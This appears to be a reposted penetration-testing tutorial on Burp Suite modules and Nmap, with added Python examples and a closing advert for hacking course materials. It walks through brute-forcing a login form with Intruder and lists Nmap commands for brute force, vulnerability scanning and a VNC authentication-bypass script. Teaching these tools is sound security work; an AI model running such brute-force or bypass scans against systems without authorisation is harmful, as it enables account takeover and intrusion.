When using passive scanning mode, Burp will not resend new requests, but only analyze existing requests and responses. This is safer for server-side detection and is usually suitable for detection in production environments. Generally speaking, the following vulnerabilities are easily detected in passive mode.

● Passwords submitted as unencrypted plaintext.  
● Insecure cookie attributes, such as missing HttpOnly and Secure flags.  
● Missing cookie scope restrictions.  
● Cross-domain script inclusion and Referer leakage.  
● Form values auto-filled, especially passwords.  
● Caching of SSL-protected content.  
● Directory listings.  
● Delayed responses after password submission.  
● Insecure transmission of session tokens.  
● Sensitive information disclosure, such as internal IP addresses, email addresses and stack traces.  
● Insecure ViewState configuration.  
● Incorrect or non-standard Content-Type directives.

Although passive scanning has many shortcomings compared with active scanning, it also has advantages the active mode lacks. Besides being safer for the server, when active testing of a business flow would corrupt that flow's state on every run, passive scanning can be used to verify whether vulnerabilities exist while reducing the risk of testing.
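The passive findings listed above are all visible in a single captured response, so they can be checked without sending anything. The script below is an added example written for this page (not Burp's own code) that applies a few of those checks, insecure cookie flags, Content-Type problems, internal IP and stack-trace disclosure, directory listings and password autocomplete, to a constructed response.

```python
import re

# Constructed HTTP response for the example (no request is sent anywhere).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; HttpOnly; Secure\r\n"
    "\r\n"
    "<html><body><form><input type='password' name='pass'></form>"
    "<pre>java.lang.NullPointerException\n"
    "\tat com.example.Login.doPost(Login.java:42)</pre>"
    "Backend: 10.0.5.17</body></html>"
)

# RFC 1918 ranges: an internal address in a response body is an information leak.
INTERNAL_IP = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b"
)
# Java and Python stack-trace fragments.
STACK_TRACE = re.compile(r"Traceback \(most recent call last\)|\bat [\w.$]+\(\w+\.java:\d+\)")
DIR_LISTING = re.compile(r"<title>\s*Index of /", re.I)


def parse_response(raw):
    """Split a raw response into status line, [(header, value)] and body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def cookie_issues(set_cookie):
    """Flag a Set-Cookie value that lacks the HttpOnly or Secure attribute."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return [f"cookie {name} lacks {flag}"
            for flag, key in (("HttpOnly", "httponly"), ("Secure", "secure"))
            if key not in attrs]


def passive_checks(raw):
    """Return the list of passive findings for one captured response."""
    _, headers, body = parse_response(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(cookie_issues(value))
    ctype = dict(headers).get("content-type")
    if ctype is None:
        findings.append("missing Content-Type header")
    elif "/" not in ctype:
        findings.append(f"malformed Content-Type: {ctype!r}")
    elif ctype.startswith("text/") and "charset=" not in ctype.lower():
        findings.append("text Content-Type without charset")
    for ip in sorted(set(INTERNAL_IP.findall(body))):
        findings.append(f"internal IP address disclosed: {ip}")
    if STACK_TRACE.search(body):
        findings.append("stack trace in response body")
    if DIR_LISTING.search(body):
        findings.append("directory listing")
    for tag in re.findall(r"<input\b[^>]*>", body, re.I):
        if re.search(r"type=[\"']?password", tag, re.I) and \
                not re.search(r"autocomplete=[\"']?off", tag, re.I):
            findings.append("password field with autocomplete enabled")
    return findings


if __name__ == "__main__":
    for f in passive_checks(SAMPLE_RESPONSE):
        print("-", f)
```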

3.2 Intruder

Intruder is a highly configurable tool for performing automated attacks on web applications, such as enumerating usernames, IDs and account numbers by identifier, fuzz testing, SQL injection, cross-site scripting, directory traversal and so on.

Its working principle is that Intruder obtains different request responses by modifying various request parameters based on the original request data. In each request, Intruder usually carries one or more effective attack loads (Payload), replays the attack at different locations, and obtains the required characteristic data through comparison and analysis of the response data. Burp Intruder is usually used in the following scenarios.

● Identifier enumeration. Web applications often use identifiers to reference data information such as users, accounts, assets, etc. For example, username, file ID, and account number.

● Extract useful data. In some scenarios, instead of simply identifying valid identifiers, other data can be extracted through simple identifiers. For example, obtain the name and age of all users in their personal space through the user's personal space ID.

● Fuzz testing. Many input vulnerabilities (such as SQL injection, cross-site scripting, and file path traversal) can be detected by submitting various test strings through request parameters and analyzing error messages and other anomalies. Due to the size and complexity of the application, performing this test manually is a time-consuming and cumbersome process, so you can set up a payload to automatically fuzz the web application through Burp Intruder.

The following demonstrates how to use the Intruder module to brute-force a login form that has neither a CAPTCHA nor rate limiting, as shown in the figure below. The method used here is only for experimentation. Readers are not allowed to use it for other illegal purposes. The premise is that you must have a good dictionary; the dictionary we prepared is shown in the figure below. Note that Burp Suite files should not be placed in paths containing Chinese characters.

First, send the captured request to the Intruder module.

Burp will automatically mark certain parameters. Here, clear all marks first.

Then select the parameter value to be brute-forced, here the pass parameter, and click the "Add §" button. Only one parameter is brute-forced here, so Sniper is used as the attack type, as shown in the figure below. Note that if you want to crack the username and password at the same time, you can mark the user and pass parameters together and select Cluster bomb mode for the brute-force attack.

● Sniper mode uses a single Payload group. It sets the payload for each location. This type of attack is suitable for scenarios where request parameters in common vulnerabilities are individually fuzzed. The total number of requests in the attack should be the product of the number of positions and the number of payloads.

● Battering ram mode uses a single Payload group. It will repeat the payload and put all the same payload into the specified location at once. This attack is suitable for situations where the same input needs to be placed in multiple places in the request. The total number of requests is the total number of payloads in the payload group.

● Pitchfork mode uses multiple Payload groups. The attack will iterate through all payload groups simultaneously and place the payload into each defined location. This attack type is ideal for situations where different but similar inputs need to be inserted in different locations. The requested quantity should be the number of payloads in the smallest payload group.

● Cluster bomb mode uses multiple Payload groups. There are different payload groups in each defined location. The attack will iterate through each payload group, and each payload combination will be tested. This attack is suitable for scenarios that require different and unrelated or unknown input attacks in the location. The total number of attack requests is the product of the number of payloads in each payload group.
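To make the four request-count formulas above concrete, here is an added model of how Intruder combines payload positions and payload sets (example code written for this page, not Burp's own; the § position markers, the login template and the USERS/PASSES lists are constructed). Knowing these counts is also what tells a defender how many attempts a lockout or rate limit has to absorb.

```python
from itertools import product
import re

# §original§ marks one payload position, the way Intruder marks them.
MARK = re.compile(r"§([^§]*)§")


def positions(template):
    """Return the original value at each marked position, in order."""
    return MARK.findall(template)


def fill(template, values):
    """Replace the i-th marked position with values[i]; None keeps the original."""
    it = iter(values)

    def repl(m):
        v = next(it)
        return m.group(1) if v is None else v

    return MARK.sub(repl, template)


def sniper(template, payloads):
    """One set, one position at a time: positions x payloads requests."""
    n = len(positions(template))
    out = []
    for i in range(n):
        for p in payloads:
            vals = [None] * n
            vals[i] = p
            out.append(fill(template, vals))
    return out


def battering_ram(template, payloads):
    """One set, same payload in every position: len(payloads) requests."""
    n = len(positions(template))
    return [fill(template, [p] * n) for p in payloads]


def pitchfork(template, *payload_sets):
    """One set per position, stepped in parallel: min(set sizes) requests."""
    return [fill(template, combo) for combo in zip(*payload_sets)]


def cluster_bomb(template, *payload_sets):
    """One set per position, every combination: product of set sizes."""
    return [fill(template, combo) for combo in product(*payload_sets)]


# Constructed login request with two marked positions (user and pass).
TEMPLATE = ("POST /login HTTP/1.1\r\nHost: target.example\r\n\r\n"
            "user=§admin§&pass=§123456§")
USERS = ["admin", "test"]
PASSES = ["123456", "password", "letmein"]

if __name__ == "__main__":
    print("sniper       ", len(sniper(TEMPLATE, PASSES)))
    print("battering ram", len(battering_ram(TEMPLATE, PASSES)))
    print("pitchfork    ", len(pitchfork(TEMPLATE, USERS, PASSES)))
    print("cluster bomb ", len(cluster_bomb(TEMPLATE, USERS, PASSES)))
```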

Select the dictionary to load, as shown below.

Then start the attack and wait for it to finish.

Here, sort by the Status or Length column and look for any result that differs from the rest. If there is one, check whether its response shows a successful login. If the returned packet clearly indicates a successful login, the credentials have been cracked, as shown in the following figure:

3.3 Repeater

Burp Repeater is a tool for manually modifying and re-issuing individual HTTP requests and analyzing their responses. Its greatest use is that it can be used in conjunction with other Burp Suite tools. You can send the target site map, Burp Proxy browsing history, and Burp Intruder attack results to Repeater, and manually adjust this request to fine-tune vulnerability detection or attack.

There are 4 Repeater analysis options: Raw, Params, Headers and Hex.

● Raw: Displays the message in plain text. A search and highlight function at the bottom of the text panel can be used to quickly locate a string, such as an error message. The pop-up to the left of the search bar controls case sensitivity and whether to search as plain text or as hexadecimal.

● Params: For requests that contain parameters (URL query string, cookie header, or message body), the Params option will display these parameters in name/value format, so that they can be easily viewed and modified.

● Headers: HTTP message headers will be displayed in name/value format, and the message body will be displayed in original format.

● Hex: Allows direct editing of messages consisting of raw binary data.

During penetration testing we often use Repeater to verify and analyse requests and responses, for example modifying request parameters to verify input vulnerabilities, modifying request parameters to verify logic-based authorization bypasses, and replaying characteristic requests captured in the interception history. In this section we send the captured packet to Repeater, as shown in the following figure:

In the Repeater operation interface, the Request on the left is the request message area, and the Response on the right is the response message area. The request message area displays the detailed information of the request message sent by the client. After we edit the request message, click the "Go" button to send the request to the server, as shown in the following figure:

The response message area displays the feedback message from the server after clicking the "GO" button for the corresponding request message. By modifying the parameters of the request message to compare and analyze the differences between each response message, it can better help us analyze possible vulnerabilities in the system, as shown in the following figure:

3.4 Compare

Burp Comparer provides a visual difference comparison function in Burp Suite for analysing the differences between two pieces of data. It is used in the following situations:

● During the process of enumerating user names, compare and analyze the difference in the feedback results from the server when the login is successful and failed.

● When using Intruder to attack, you can quickly analyze the difference between the two responses based on different server responses.

● When performing blind SQL injection testing, compare the differences between two response messages to determine the relationship between the response and the injected condition.

There are two steps when using Comparer. The first is data loading:

Then there is the difference analysis:

The common ways of loading Comparer data are as follows.

● Forwarded from other Burp tools via context menu.

● Paste directly.

● Load from file.

After loading, once you select two different request or response messages, the comparison buttons at the bottom become active and you can choose a text comparison or a byte comparison.

3.5 Sequencer

Burp Sequencer is a tool for analyzing the randomness quality of data samples. You can use it to test scenarios such as whether the application's session token (Session token) and password reset token are predictable. Through Sequencer's data sample analysis, you can well reduce the risk of these key data being forged.

Burp Sequencer is mainly composed of three modules: information interception (Live Capture), manual loading (Manual Load) and option analysis (Analysis Options).

After intercepting the information, click the Load button to load the information, and then click the "Analyze now" button to analyze, as shown in the following figure:

Nmap

1.Nmap detailed explanation

Nmap (Network Mapper) is an open source network detection and security audit tool. It is designed to quickly scan large networks, including host detection and discovery, open port status, operating system and application service fingerprinting, WAF identification and common security vulnerabilities. Its graphical interface is Zenmap and the distributed framework is DNmap.

The features of Nmap are as follows:

● Host detection: Detect hosts on the network, for example listing hosts that respond to TCP or ICMP probes, or that have particular ports open.

● Port scanning: detect the ports opened by the target host.

● Version detection: Detect the network service of the target host and determine its service name and version number.

● System detection: Detect the operating system of the target host and the hardware characteristics of the network equipment.

● Supports the writing of detection scripts: using Nmap's script engine (NSE) and Lua programming language.

2.Install Nmap

The download address of Nmap is https://nmap.org/download.html. The version downloaded in this section is 7.40. Readers can install step by step according to the prompts during the installation process, as shown in the figure below:

3. Getting started with Nmap

3.1 Scan parameters

After entering the installation directory, run Nmap directly on the command line or view the help text (enter nmap --help). The usage and functions of Nmap will be displayed, as shown in the following figure:

Before explaining the specific usage, let's first introduce the meaning and usage of Nmap's related parameters. First, we introduce the relevant parameters used when setting the scanning target, as follows:

● -iL: import target hosts or network segments from a file.  
● -iR: choose target hosts at random.  
● --exclude: the hosts or network segments that follow are excluded from the scan.  
● --excludefile: the hosts or network segments listed in the given file are excluded from the scan.  
Parameters related to host discovery are as follows.  
● -sL: List Scan, only lists the IPs of the specified targets without performing host discovery.  
● -sn: Ping Scan, only performs host discovery, no port scan.  
● -Pn: treat all specified hosts as up and skip host discovery.  
● -PS/PA/PU/PY[portlist]: discover hosts using TCP SYN/ACK, UDP or SCTP INIT/ECHO probes.  
● -PE/PP/PM: discover hosts using ICMP echo, timestamp and netmask request packets.  
● -PO[protocollist]: use IP protocol packets to probe whether the host is up.  
● -n/-R: -n means never do DNS resolution; -R means always do DNS resolution.  
● --dns-servers <serv1[,serv2],...>: specify the DNS servers to use.  
● --system-dns: use the system's DNS resolver.  
● --traceroute: trace every routing hop.  
Parameters related to the common port scanning methods are as follows.  
● -sS/sT/sA/sW/sM: scan the target host using TCP SYN/Connect()/ACK/Window/Maimon scans.  
● -sU: use a UDP scan to determine the state of the target host's UDP ports.  
● -sN/sF/sX: use TCP Null/FIN/Xmas stealth scans to help determine the state of the target's TCP ports.  
● --scanflags <flags>: customise the flags of the TCP packets.  
● -sI <zombie host[:probeport]>: scan the target host using an Idle scan (a suitable zombie host must be found first).  
● -sY/sZ: use SCTP INIT/COOKIE-ECHO scans to check whether SCTP ports are open.  
● -sO: use an IP protocol scan to determine which protocols the target supports.  
● -b <FTP relay host>: use an FTP bounce scan.  
Parameters related to port specification and scan order are as follows.  
● -p <port ranges>: scan the specified ports.  
● -F: Fast mode, scan only the top 100 ports.  
● -r: do not randomise the port order (without this parameter, Nmap scans the ports in random order, which makes the scan harder for the target's firewall to detect).  
● --top-ports <number>: scan the <number> ports most likely to be open (the Nmap author once ran large-scale Internet scans to estimate how likely each port is to be open and ranked the most likely ones; see the nmap-services file. By default Nmap scans the 1000 most likely TCP ports).  
● --port-ratio <ratio>: scan ports at or above the given frequency. Similar to --top-ports above, but the argument is a probability, and only ports whose probability exceeds --port-ratio are scanned. The parameter must therefore lie between 0 and 1; see the nmap-services file for the actual probability range.  
Parameters related to version detection are as follows.  
● -sV: have Nmap perform version detection.  
● --version-intensity <level>: set the intensity of version detection (0~9), default 7. Higher values detect services more accurately but take longer to run.  
● --version-light: use lightweight detection (intensity 2).  
● --version-all: try every probe (intensity 9).  
● --version-trace: show detailed information about the version detection process.

After understanding the above parameters and their meanings, it will be better to understand the usage. The scanning command format is: Nmap + scanning parameters + target address or network segment. For example, a complete Nmap scan command is as follows:

nmap -T4 -A -v ip

Here -A means an aggressive scan, and -T4 sets the timing template used during the scan. There are six levels (0~5): the higher the level, the faster the scan, but the more easily it is detected and blocked by a firewall or IDS. T4 is recommended when network conditions are good. -v enables verbose output and shows scan details while the scan runs, which helps the user follow the current scan status.

3.2 Common methods

Nmap has many parameters, but usually not that many are used. The following are the more common commands during penetration testing.

1. Scan a single target address

Just add the target address directly after Nmap to scan, as shown in the figure below:

nmap 192.168.0.100

2. Scan multiple target addresses

If the target addresses are not in the same network segment, or are in the same network segment but are not consecutive and have a small number, you can use this method to scan, as shown in the following figure:

nmap 192.168.0.100 192.168.0.105

3. Scan a range of target addresses

You can specify to scan a continuous network segment, using a "-" connection in the middle. For example, the following command indicates that the scanning range is 192.168.0.100~192.168.0.110, as shown in the following figure:

nmap 192.168.0.100-110

4. Scan a certain network segment where the target address is located

Taking a class C segment as an example, if the target is a whole network segment you can scan it by adding a subnet mask. The following command scans the range 192.168.0.1~192.168.0.255, as shown in the figure below:

nmap 192.168.0.100/24

5. Scan all target addresses in the host list targets.txt

Scan the address or network segment in targets.txt. The absolute path is imported here. If the targets.txt file is in the same directory as nmap.exe, just quote the file name directly, as shown in the following figure:

nmap -iL C:\Users\Aerfa\Desktop\targets.txt

6. Scan all target addresses except one target address

The following command means to scan other 192.168.0.x addresses except 192.168.0.105. Judging from the scan results, 192.168.0.105 is indeed not scanned, as shown in the following figure:

nmap 192.168.0.100/24 --exclude 192.168.0.105

7. Scan target addresses other than those in a file

The following command scans all target addresses except those (addresses or network segments) listed in the targets.txt file. Taking the 192.168.0.x segment as an example, add 192.168.0.100 and 192.168.0.105 to targets.txt. The scan results confirm that this method works, as shown in the following figure:

nmap 192.168.0.100/24 --excludefile C:\Users\Aerfa\Desktop\targets.txt

8. Scan ports 21, 22, 23, and 80 of a certain target address

If you do not need to perform a full port scan on the target host and just want to detect whether it has a certain port open, then using the -p parameter to specify the port number will greatly improve the scanning speed, as shown in the following figure:

nmap 192.168.0.100 -p 21,22,23,80

9. Perform route tracing on the target address

The following command indicates route tracing for the target address, as shown in the figure below:

nmap --traceroute 192.168.0.105

10. Scan the online status of segment C where the target address is located

The following command indicates the online status of segment C where the scan target address is located, as shown in the following figure:

nmap -sP 192.168.0.100/24

11. Operating system fingerprinting of target address

The following command indicates the version of the operating system that identifies the target address through fingerprint recognition technology, as shown in the following figure:

nmap -O 192.168.0.105

12. Detection of service version provided by the target address

The following command indicates to detect the service version information corresponding to the port opened by the target address, as shown in the following figure:

nmap -sV 192.168.0.105

13. Detect firewall status

In actual combat, FIN scanning can be used to detect the status of the firewall. FIN scanning is used to identify whether the port is closed. Receiving an RST reply indicates that the port is closed. Otherwise, it is in the open or filtered state, as shown in the following figure:

nmap -sF -T4 192.168.0.105

3.3 Status recognition

Nmap outputs a scan list, including port number, port status, service name, service version and protocol. There are usually 6 states as shown in the table below.

Understanding these states helps us decide which method or attack technique to use next during penetration testing.
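Nmap's six port states are open, closed, filtered, unfiltered, open|filtered and closed|filtered. As an added example (not part of the original article or of Nmap itself), the parser below reads Nmap's -oX XML output and sorts ports by those states, separating confirmed-open ports from ambiguous ones that need a follow-up probe; the XML sample is constructed and trimmed to the elements the parser uses.

```python
import xml.etree.ElementTree as ET
from collections import Counter

NMAP_STATES = ("open", "closed", "filtered", "unfiltered",
               "open|filtered", "closed|filtered")

# Constructed, trimmed sample of `nmap -sV -oX` output for one host.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.0.105">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.0.105" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="23"><state state="closed" reason="reset"/>
        <service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6"/></port>
      <port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/>
        <service name="microsoft-ds"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/>
        <service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_ports(xml_text):
    """Return [(host, proto, port, state, service, version)] for every <port>."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state").get("state")
            if state not in NMAP_STATES:
                raise ValueError(f"unexpected port state {state!r}")
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            version = ""
            if svc is not None:
                version = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            rows.append((addr, port.get("protocol"), int(port.get("portid")),
                         state, name, version))
    return rows


def state_counts(rows):
    """How many ports ended up in each of the six states."""
    return Counter(r[3] for r in rows)


def confirmed_open(rows):
    """Ports a tester can act on directly: only the unambiguous 'open' state."""
    return [r for r in rows if r[3] == "open"]


def needs_follow_up(rows):
    """'filtered' and 'open|filtered' are ambiguous: no reply was seen, so a
    different probe type (or a scan from another vantage point) is needed."""
    return [r for r in rows if r[3] in ("filtered", "open|filtered")]


if __name__ == "__main__":
    rows = parse_ports(SAMPLE_XML)
    print(dict(state_counts(rows)))
    for r in confirmed_open(rows):
        print("open:", r)
    for r in needs_follow_up(rows):
        print("follow up:", r)
```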

3.4 Script introduction

Nmap scripts are stored in the /xx/nmap/scripts folder by default, as shown in the following figure:

Nmap scripts are mainly divided into the following categories:

● Auth: scripts that deal with authentication credentials (bypassing authentication).  
● Broadcast: discover more services on the local network, such as DHCP/DNS/SQL Server.  
● Brute: brute-force attacks against common applications such as HTTP/SMTP.  
● Default: the scripts run by default with the -sC or -A option, providing basic script scanning capability.  
● Discovery: gather more information about the network, such as SMB enumeration and SNMP queries.  
● Dos: used for denial-of-service attacks.  
● Exploit: exploit known vulnerabilities to break into systems.  
● External: use third-party databases or resources, for example Whois lookups.  
● Fuzzer: fuzzing scripts that send malformed packets to the target to uncover potential vulnerabilities.  
● Intrusive: intrusive scripts that may trigger logging or blocking by the target's IDS/IPS.  
● Malware: detect whether the target is infected with malware, has a backdoor open, and so on.  
● Safe: the opposite of Intrusive; scripts considered safe to run.  
● Version: scripts that enhance service and version detection.  
● Vuln: check whether the target has common vulnerabilities, such as MS08-067.

Users can also set --script=<category> to scan with a chosen category as needed. Commonly used parameters are as follows:

● -sC/--script=default: scan with the default scripts.  
● --script=<Lua scripts>: scan with a specific script.  
● --script-args=key1=value1,key2=value2...: pass arguments to scripts; key1 is the argument name and value1 its value. Separate additional arguments with commas.  
● --script-args-file=filename: provide script arguments from a file.  
● --script-trace: show the data sent and received while scripts run.  
● --script-updatedb: Nmap's scripts directory contains a script.db file that records the scripts currently available to Nmap, like a small database; when Nmap is run with this parameter it scans the scripts directory for additional scripts and updates that database.  
● --script-help: Nmap prints the script's usage arguments and a detailed description.

3.5 Examples

1.Authentication scan

Use --script=auth to run weak-credential detection against the target host or the network segment it is on, as shown in the following figure:

nmap --script=auth 192.168.0.105

2. Brute force attack

Nmap has the function of brute force cracking, which can brute force guess simple passwords for databases, SMB, SNMP, etc., as shown in the following figure:

nmap --script=brute 192.168.0.105

3. Scan for common vulnerabilities

Nmap has a vulnerability scanning function that can check whether there are common vulnerabilities in the target host or network segment, as shown in the following figure:

nmap --script=vuln 192.168.0.105

4. Application service scanning

Nmap has scanning scripts for many common application services, such as VNC service, MySQL service, Telnet service, Rsync service, etc. Here we take the VNC service as an example, as shown in the following figure:

nmap --script=realvnc-auth-bypass 192.168.0.105

5. Detect the opening of more services in the LAN

Enter the following command to detect the opening of more services in the LAN, as shown in the figure below:

nmap -n -p 445 --script=broadcast 192.168.0.105

6.Whois analysis

Use a third-party database or resource to query the target address information, such as Whois analysis, as shown in the following figure:

nmap --script=external baidu.com

For more information on how to use scanning scripts, see https://nmap.org/nsedoc/categories.

Author of this article: woshidatianguan, please indicate the source of reprint from FreeBuf.COM

How to learn hacking & network security

As long as you like my article today, my private network security learning materials will be shared with you for free. Come and see what is available.

1. Learning roadmap

There are a lot of things to learn about attack and defense. I have written down the specific things you need to learn in the road map above. If you can complete them, you will have no problem getting a job or taking on a private job.

2. Video tutorial

Although there are many learning resources on the Internet, they are basically incomplete. This is an Internet security video tutorial I recorded myself. I have accompanying video explanations for every knowledge point in the roadmap above.

The content covers the study of network security laws, network security operations and other security assessments, penetration testing basics, detailed explanations of vulnerabilities, basic computer knowledge, etc. They are all must-know learning contents for getting started with network security.

(They are all packaged into one piece and cannot be expanded one by one. There are more than 300 episodes in total)

Due to limited space, only part of the information is displayed. You need to click on the link below to obtain it.

CSDN gift package: "Hacker & Network Security Introduction & Advanced Learning Resource Package" free sharing

3. Technical documents and e-books

I also compiled the technical documents myself, including my experience and technical points in participating in large-scale network security operations, CTF, and digging SRC vulnerabilities. There are more than 200 e-books. Due to the sensitivity of the content, I will not display them one by one.


4. Toolkit, interview questions and source code

"If you want to do your job well, you must first sharpen your tools." I have summarized dozens of the most popular hacking tools for everyone. The scope of coverage mainly focuses on information collection, Android hacking tools, automation tools, phishing, etc. Interested students should not miss it.

There is also the case source code and corresponding toolkit mentioned in my video, which you can take away if needed.


Finally, here are the interview questions about network security that I have compiled over the past few years. If you are looking for a job in network security, they will definitely help you a lot.

These questions are often encountered when interviewing Sangfor, Qi Anxin, Tencent or other major companies. If you have good questions or good insights, please share them.

Reference analysis: Sangfor official website, Qi’anxin official website, Freebuf, csdn, etc.

Content features: Clear organization and graphical representation to make it easier to understand.

Summary of content: Including intranet, operating system, protocol, penetration testing, security service, vulnerability, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logical vulnerability, tools, SQLmap, NMAP, BP, MSF…



Origin blog.csdn.net/Javachichi/article/details/135213125